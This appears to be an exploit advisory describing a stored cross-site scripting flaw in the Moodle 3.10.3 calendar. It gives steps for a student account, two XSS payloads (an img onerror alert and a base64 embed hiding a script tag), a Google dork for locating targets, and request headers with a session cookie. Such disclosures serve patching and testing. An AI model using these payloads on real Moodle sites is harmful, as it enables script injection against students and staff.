Moodle 3.10.3 Cross Site Scripting

Moodle version 3.10.3 suffers from a cross site scripting vulnerability.

MD5 | 08344b5e7eab7a03c9d6a98f727e3d94

# Exploit Title: Moodle 3.10.3 Calendar Cross Site Scripting
# Date: 25.03.2021
# Author: Vincent666 ibn Winnie
# Software Link:
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# Google Dorks: inurl:/lib/editor/atto/plugins/managefiles/ or
# My Youtube Channel:


Video PoC:

Use Demo:

Choose a role : Student (example)

Open calendar :

Create new event:


Event Title "Test"

Description :Choose Insert Video File and choose Video:

Video Source Url you can paste video link from youtube

And open Subtitles and Captions:

Subtitle track URL use video link from youtube

Field Label : There is we can use xss code:

<img src="1" onerror="alert(1)" />

or try in base64

<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+"
type="image/svg+xml" AllowScriptAccess="always"></embed>

Insert Media and save this.

Open event and get stored xss.



User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
Gecko/20100101 Firefox/87.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate, br

Content-Type: application/json

X-Requested-With: XMLHttpRequest

Content-Length: 996


Connection: keep-alive


Cookie: MoodleSession=4ea0036558425526decc096ed375b886;


Related Posts